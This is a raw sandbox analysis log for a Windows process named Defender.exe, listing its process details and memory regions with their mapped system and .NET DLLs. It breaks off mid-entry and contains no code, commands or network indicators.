# Flog Txt Version 1 # Analyzer Version: 2.2.0 # Analyzer Build Date: Feb 8 2018 15:49:39 # Log Creation Date: 08.02.2018 14:58:01.316 Process: id = "1" image_name = "defender.exe" filename = "c:\\users\\eebsym5\\desktop\\defender.exe" page_root = "0x7ee365e0" os_pid = "0x9e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\EEBsYm5\\Desktop\\Defender.exe\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ee48" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 136 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 137 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 138 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 139 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 140 start_va = 0xe60000 end_va = 0xed1fff entry_point = 0xe60000 region_type = mapped_file name = "defender.exe" filename = "\\Users\\EEBsYm5\\Desktop\\Defender.exe" (normalized: "c:\\users\\eebsym5\\desktop\\defender.exe") Region: id = 141 start_va = 0x77320000 end_va = 0x7745bfff entry_point = 0x77320000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 142 start_va = 0x77560000 end_va = 0x77560fff entry_point = 0x77560000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 143 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 144 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 145 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 146 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 147 start_va = 0x6f3a0000 end_va = 0x6f3e9fff entry_point = 0x6f3a0000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 148 start_va = 0x75570000 end_va = 0x755b9fff entry_point = 0x75570000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 149 start_va = 0x77240000 end_va = 0x77313fff entry_point = 0x77240000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 150 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 151 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 152 start_va = 0x580000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 153 start_va = 0x5f0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 154 start_va = 0x75c80000 end_va = 0x75d20fff entry_point = 0x75c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 155 start_va = 0x75f70000 end_va = 0x75f88fff entry_point = 0x75f70000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 156 start_va = 0x75f90000 end_va = 0x7602ffff entry_point = 0x75f90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 157 start_va = 0x76070000 end_va = 0x7611bfff entry_point = 0x76070000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 158 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 159 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 160 start_va = 0x6f320000 end_va = 0x6f397fff entry_point = 0x6f320000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 161 start_va = 0x75770000 end_va = 0x75838fff entry_point = 0x75770000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 162 start_va = 0x75890000 end_va = 0x758ddfff entry_point = 0x75890000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 163 start_va = 0x75f60000 end_va = 0x75f69fff entry_point = 0x75f60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 164 start_va = 0x76360000 end_va = 0x763fcfff entry_point = 0x76360000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 165 start_va = 0x77050000 end_va = 0x770a6fff entry_point = 0x77050000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 166 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 167 start_va = 0x758f0000 end_va = 0x7590efff entry_point = 0x758f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 168 start_va = 0x76130000 end_va = 0x761fbfff entry_point = 0x76130000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 169 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 170 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 171 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 172 start_va = 0xee0000 end_va = 0x1adffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ee0000" filename = "" Region: id = 173 start_va = 0x749c0000 end_va = 0x749c8fff entry_point = 0x749c0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 174 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 175 start_va = 0x6a0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 176 start_va = 0x6ceb0000 end_va = 0x6d45afff entry_point = 0x6ceb0000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 177 start_va = 0x6d7a0000 end_va = 0x6d83afff entry_point = 0x6d7a0000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll") Region: id = 178 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 179 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 180 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 181 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 182 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 183 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 184 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 185 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 186 start_va = 0x860000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 187 start_va = 0x8a0000 end_va = 0x99ffff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 188 start_va = 0x76400000 end_va = 0x77049fff entry_point = 0x76400000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 189 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 190 start_va = 0x550000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 191 start_va = 0x76200000 end_va = 0x7635bfff entry_point = 0x76200000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 192 start_va = 0x9a0000 end_va = 0xc6efff entry_point = 0x9a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 193 start_va = 0x75470000 end_va = 0x7547afff entry_point = 0x75470000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 194 start_va = 0x600000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 195 start_va = 0x6e0000 end_va = 0x73bfff entry_point = 0x6e0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 196 start_va = 0xd60000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 197 start_va = 0x1ae0000 end_va = 0x3adffff entry_point = 0x0 region_type = private name = "private_0x0000000001ae0000" filename = "" Region: id = 198 start_va = 0x6c3b0000 end_va = 0x6cea7fff entry_point = 0x6c3b0000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll") Region: id = 199 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 200 start_va = 0x6e0000 end_va = 0x73bfff entry_point = 0x6e0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 201 start_va = 0x753c0000 end_va = 0x753cbfff entry_point = 0x753c0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 202 start_va = 0x742d0000 end_va = 0x7430ffff entry_point = 0x742d0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 203 start_va = 0x3ae0000 end_va = 0x3cfffff entry_point = 0x0 region_type = private name = "private_0x0000000003ae0000" filename = "" Region: id = 204 start_va = 0x6e0000 end_va = 0x7befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 205 start_va = 0x560000 end_va = 0x562fff entry_point = 0x560000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls") Region: id = 206 start_va = 0x570000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 207 start_va = 0x6d740000 end_va = 0x6d79afff entry_point = 0x6d740000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll") Region: id = 208 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 209 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 210 start_va = 0x6bc10000 end_va = 0x6c3abfff entry_point = 0x6bc10000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll") Region: id = 211 start_va = 0x7c0000 end_va = 0x7d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 212 start_va = 0x6d640000 end_va = 0x6d730fff entry_point = 0x6d640000 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuration\\bc09ad2d49d8535371845cd7532f9271\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuration\\bc09ad2d49d8535371845cd7532f9271\\system.configuration.ni.dll") Region: id = 213 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 214 start_va = 0x7e0000 end_va = 0x7e4fff entry_point = 0x7e0000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 215 start_va = 0x7f0000 end_va = 0x830fff entry_point = 0x7f0000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 216 start_va = 0x6b6d0000 end_va = 0x6bc05fff entry_point = 0x6b6d0000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll") Region: id = 217 start_va = 0x72cd0000 end_va = 0x72ce4fff entry_point = 0x72cd0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 218 start_va = 0x72cf0000 end_va = 0x72d41fff entry_point = 0x72cf0000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 219 start_va = 0x76030000 end_va = 0x76064fff entry_point = 0x76030000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 220 start_va = 0x76120000 end_va = 0x76125fff entry_point = 0x76120000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 221 start_va = 0x73bf0000 end_va = 0x73bfcfff entry_point = 0x73bf0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 222 start_va = 0x3b60000 end_va = 0x3c5ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b60000" filename = "" Region: id = 223 start_va = 0x3cc0000 end_va = 0x3cfffff entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 224 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 225 start_va = 0x74f00000 end_va = 0x74f3bfff entry_point = 0x74f00000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 226 start_va = 0x3d00000 end_va = 0x3f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 227 start_va = 0x74a50000 end_va = 0x74a54fff entry_point = 0x74a50000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 228 start_va = 0x74ef0000 end_va = 0x74ef5fff entry_point = 0x74ef0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 229 start_va = 0x840000 end_va = 0x85ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 230 start_va = 0x870000 end_va = 0x87ffff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 231 start_va = 0x880000 end_va = 0x886fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 232 start_va = 0x890000 end_va = 0x891fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 233 start_va = 0x3f10000 end_va = 0x4302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f10000" filename = "" Region: id = 234 start_va = 0xc70000 end_va = 0xd2ffff entry_point = 0xc70000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 235 start_va = 0x3dc0000 end_va = 0x3ebffff entry_point = 0x0 region_type = private name = "private_0x0000000003dc0000" filename = "" Region: id = 236 start_va = 0x3ed0000 end_va = 0x3f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 237 start_va = 0x4410000 end_va = 0x450ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 238 start_va = 0x4580000 end_va = 0x467ffff entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 239 start_va = 0x716f0000 end_va = 0x7173efff entry_point = 0x716f0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 240 start_va = 0x71740000 end_va = 0x71797fff entry_point = 0x71740000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 241 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 242 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 243 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 244 start_va = 0x736d0000 end_va = 0x736ebfff entry_point = 0x736d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 245 start_va = 0x736c0000 end_va = 0x736c6fff entry_point = 0x736c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 246 start_va = 0x735d0000 end_va = 0x735dcfff entry_point = 0x735d0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 247 start_va = 0x73560000 end_va = 0x73571fff entry_point = 0x73560000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 248 start_va = 0x753a0000 end_va = 0x753bafff entry_point = 0x753a0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 249 start_va = 0x74f40000 end_va = 0x74f55fff entry_point = 0x74f40000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 250 start_va = 0x74c10000 end_va = 0x74c17fff entry_point = 0x74c10000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 251 start_va = 0x754f0000 end_va = 0x75516fff entry_point = 0x754f0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 252 start_va = 0x4310000 end_va = 0x440ffff entry_point = 0x0 region_type = private name = "private_0x0000000004310000" filename = "" Region: id = 253 start_va = 0x4680000 end_va = 0x477ffff entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 254 start_va = 0x74f40000 end_va = 0x74f55fff entry_point = 0x74f40000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 255 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 256 start_va = 0x3ae0000 end_va = 0x3b1bfff entry_point = 0x3ae0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 257 start_va = 0x3ae0000 end_va = 0x3b1bfff entry_point = 0x3ae0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 258 start_va = 0x3ae0000 end_va = 0x3b1bfff entry_point = 0x3ae0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 259 start_va = 0x3ae0000 end_va = 0x3b1bfff entry_point = 0x3ae0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 260 start_va = 0x3ae0000 end_va = 0x3b1bfff entry_point = 0x3ae0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 261 start_va = 0x74ce0000 end_va = 0x74d1afff entry_point = 0x74ce0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 262 start_va = 0x75460000 end_va = 0x7546dfff entry_point = 0x75460000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 263 start_va = 0x4800000 end_va = 0x48fffff entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 264 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 265 start_va = 0x74dc0000 end_va = 0x74e03fff entry_point = 0x74dc0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 266 start_va = 0x4900000 end_va = 0x4a2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 267 start_va = 0x6f930000 end_va = 0x6f935fff entry_point = 0x6f930000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 268 start_va = 0x73580000 end_va = 0x735b7fff entry_point = 0x73580000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 269 start_va = 0x4a30000 end_va = 0x4beffff entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 270 start_va = 0x6aaf0000 end_va = 0x6b6cdfff entry_point = 0x6aaf0000 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Windows.Forms\\3afcd5168c7a6cb02eab99d7fd71e102\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.windows.forms\\3afcd5168c7a6cb02eab99d7fd71e102\\system.windows.forms.ni.dll") Region: id = 271 start_va = 0x6d4b0000 end_va = 0x6d637fff entry_point = 0x6d4b0000 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Drawing\\dbfe8642a8ed7b2b103ad28e0c96418a\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.drawing\\dbfe8642a8ed7b2b103ad28e0c96418a\\system.drawing.ni.dll") Region: id = 272 start_va = 0xd30000 end_va = 0xd30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d30000" filename = "" Region: id = 273 start_va = 0x60340000 end_va = 0x60347fff entry_point = 0x60340000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll") Region: id = 274 start_va = 0x3ae0000 end_va = 0x3b33fff entry_point = 0x3ae0000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll") Region: id = 275 start_va = 0x4c60000 end_va = 0x4d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c60000" filename = "" Region: id = 276 start_va = 0x6a8b0000 end_va = 0x6aae4fff entry_point = 0x6a8b0000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll") Region: id = 277 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 278 start_va = 0x74b20000 end_va = 0x74b36fff entry_point = 0x74b20000 region_type = mapped_file 